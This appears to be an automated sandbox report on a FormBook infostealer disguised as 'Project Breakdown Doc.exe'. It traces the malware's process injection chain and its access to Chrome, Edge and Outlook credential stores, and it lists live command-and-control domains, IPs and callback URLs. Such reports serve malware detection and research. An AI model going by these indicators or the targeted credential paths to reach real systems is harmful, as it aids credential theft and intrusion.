                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C981F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C6A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C6A364 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\powercfg.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: NULL target: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe protection: read write
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: NULL target: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\powercfg.exe | Thread register set: target process: 7928
                Source: C:\Windows\SysWOW64\powercfg.exe | Thread APC queued: target process: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3131008
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C98C93 LogonUserW
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C43B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C44A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CA4EC9 mouse_event
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Project Breakdown Doc.exe"
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | Process created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"
                Source: C:\Windows\SysWOW64\powercfg.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C981F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CA4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: Project Breakdown Doc.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Project Breakdown Doc.exe, VFfhzkOtKq.exe, 00000005.00000002.2936459498.00000000013B0000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000000.2174810905.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2936718603.0000000000F70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: VFfhzkOtKq.exe, 00000005.00000002.2936459498.00000000013B0000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000000.2174810905.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2936718603.0000000000F70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: VFfhzkOtKq.exe, 00000005.00000002.2936459498.00000000013B0000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000000.2174810905.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2936718603.0000000000F70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: VFfhzkOtKq.exe, 00000005.00000002.2936459498.00000000013B0000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000000.2174810905.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2936718603.0000000000F70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C6886B cpuid
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C750D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C82230 GetUserNameW
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C7418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C44AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2936946828.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2936746920.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2935024128.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\powercfg.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: Project Breakdown Doc.exe | Binary or memory string: WIN_81
                Source: Project Breakdown Doc.exe | Binary or memory string: WIN_XP
                Source: Project Breakdown Doc.exe | Binary or memory string: WIN_XPe
                Source: Project Breakdown Doc.exe | Binary or memory string: WIN_VISTA
                Source: Project Breakdown Doc.exe | Binary or memory string: WIN_7
                Source: Project Breakdown Doc.exe | Binary or memory string: WIN_8
                Source: Project Breakdown Doc.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2936946828.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2936746920.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2935024128.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CB6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CB6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (techniques with signature hits per tactic; hit count in parentheses)

                Reconnaissance: no hits
                Resource Development: no hits
                Initial Access: Valid Accounts (2)
                Execution: Native API (1)
                Persistence: DLL Side-Loading (1), Valid Accounts (2)
                Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (412)
                Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (2), DLL Side-Loading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (2), Access Token Manipulation (21), Process Injection (412)
                Credential Access: OS Credential Dumping (1), Input Capture (21)
                Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (116), Security Software Discovery (151), Virtualization/Sandbox Evasion (2), Process Discovery (3), Application Window Discovery (11), System Owner/User Discovery (1)
                Lateral Movement: no hits
                Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3)
                Command and Control: Ingress Tool Transfer (4), Encrypted Channel (1), Non-Application Layer Protocol (4), Application Layer Protocol (4)
                Exfiltration: no hits
                Impact: System Shutdown/Reboot (1)

                Behavior Graph

                Behavior Graph ID: 1560859
                Sample: Project Breakdown Doc.exe
                Startdate: 22/11/2024
                Architecture: WINDOWS
                Score: 100
                Sample-level network nodes: www.wine-drinkers.club, www.supernutra01.online, 3 other IPs or domains
                Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 5 other signatures
                Process chain:
                Project Breakdown Doc.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
                -> svchost.exe (started): Maps a DLL or memory area into another process
                -> -> VFfhzkOtKq.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
                -> -> -> powercfg.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                -> -> -> -> VFfhzkOtKq.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); network: www.1secondlending.one 43.205.198.29 (ports 49808, 49815, 49821; LILLY-ASUS Japan), www.wine-drinkers.club 194.245.148.189 (ports 49882, 49888, 49899; CSLDE Germany), 2 other IPs or domains
                -> -> -> -> firefox.exe (started)

                Source | Detection | Scanner | Label
                Project Breakdown Doc.exe | 53% | ReversingLabs | Win32.Trojan.Znyonm
                Project Breakdown Doc.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://www.1secondlending.one/6pwo/?AFF=OcYLCa3XOMtt+RsgzD1zLQYXF21NRX3aDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abnTc9bVWqvwMitNejIQMZs4A8D92e/CCvcvI=&qjBT=BfTHe4BP_zkdflN | 0% | Avira URL Cloud | safe
                http://www.wine-drinkers.club | 0% | Avira URL Cloud | safe
                http://www.qqa79.top/mz0w/?qjBT=BfTHe4BP_zkdflN&AFF=uMzU0JGK22aEYJLN9gIRRbcx6PQvWyWv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wws6pM55HNj3BAq/9ra29WeR04lUyUIOcydT8= | 0% | Avira URL Cloud | safe
                http://www.supernutra01.online/rk61/ | 0% | Avira URL Cloud | safe
                http://www.wine-drinkers.club/hakt/ | 0% | Avira URL Cloud | safe
                http://www.supernutra01.online/rk61/?qjBT=BfTHe4BP_zkdflN&AFF=4Jev6jkxg6xEO7Dapp2OtVT6jS0ALsNacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9NGZN+wjn/QV3LQCc1WVNeTcwGOVDWPFPiYw= | 0% | Avira URL Cloud | safe
                http://www.1secondlending.one/6pwo/ | 0% | Avira URL Cloud | safe
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                qqa79.top | 38.47.233.21 | true | false | | unknown
                www.supernutra01.online | 172.67.220.36 | true | true | | unknown
                www.1secondlending.one | 43.205.198.29 | true | true | | unknown
                www.wine-drinkers.club | 194.245.148.189 | true | true | | unknown
                www.qqa79.top | unknown | unknown | false | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://www.1secondlending.one/6pwo/?AFF=OcYLCa3XOMtt+RsgzD1zLQYXF21NRX3aDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abnTc9bVWqvwMitNejIQMZs4A8D92e/CCvcvI=&qjBT=BfTHe4BP_zkdflN | true | Avira URL Cloud: safe | unknown
                http://www.qqa79.top/mz0w/?qjBT=BfTHe4BP_zkdflN&AFF=uMzU0JGK22aEYJLN9gIRRbcx6PQvWyWv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wws6pM55HNj3BAq/9ra29WeR04lUyUIOcydT8= | false | Avira URL Cloud: safe | unknown
                http://www.wine-drinkers.club/hakt/ | true | Avira URL Cloud: safe | unknown
                http://www.supernutra01.online/rk61/?qjBT=BfTHe4BP_zkdflN&AFF=4Jev6jkxg6xEO7Dapp2OtVT6jS0ALsNacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9NGZN+wjn/QV3LQCc1WVNeTcwGOVDWPFPiYw= | true | Avira URL Cloud: safe | unknown
                http://www.supernutra01.online/rk61/ | true | Avira URL Cloud: safe | unknown
                http://www.1secondlending.one/6pwo/ | true | Avira URL Cloud: safe | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://ac.ecosia.org/autocomplete?q= | powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/chrome_newtab | powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/ac/?q= | powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico | powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://kb.fastpanel.direct/troubleshoot/ | powercfg.exe, 00000006.00000002.2937780821.0000000004408000.00000004.10000000.00040000.00000000.sdmp, powercfg.exe, 00000006.00000002.2939443430.0000000006790000.00000004.00000800.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.0000000002F78000.00000004.00000001.00040000.00000000.sdmp | false | | high
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.wine-drinkers.club | VFfhzkOtKq.exe, 00000007.00000002.2938680835.0000000004CFA000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://www.ecosia.org/newtab/ | powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
IP               Domain                    Country         ASN    ASN Name          Malicious
38.47.233.21     qqa79.top                 United States   174    COGENT-174US      false
43.205.198.29    www.1secondlending.one    Japan           4249   LILLY-ASUS        true
194.245.148.189  www.wine-drinkers.club    Germany         5517   CSLDE             true
172.67.220.36    www.supernutra01.online   United States   13335  CLOUDFLARENETUS   true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560859
Start date and time: 2024-11-22 12:40:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Project Breakdown Doc.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 46
• Number of non-executed functions: 276
Cookbook Comments:
• Found application associated with file extension: .exe
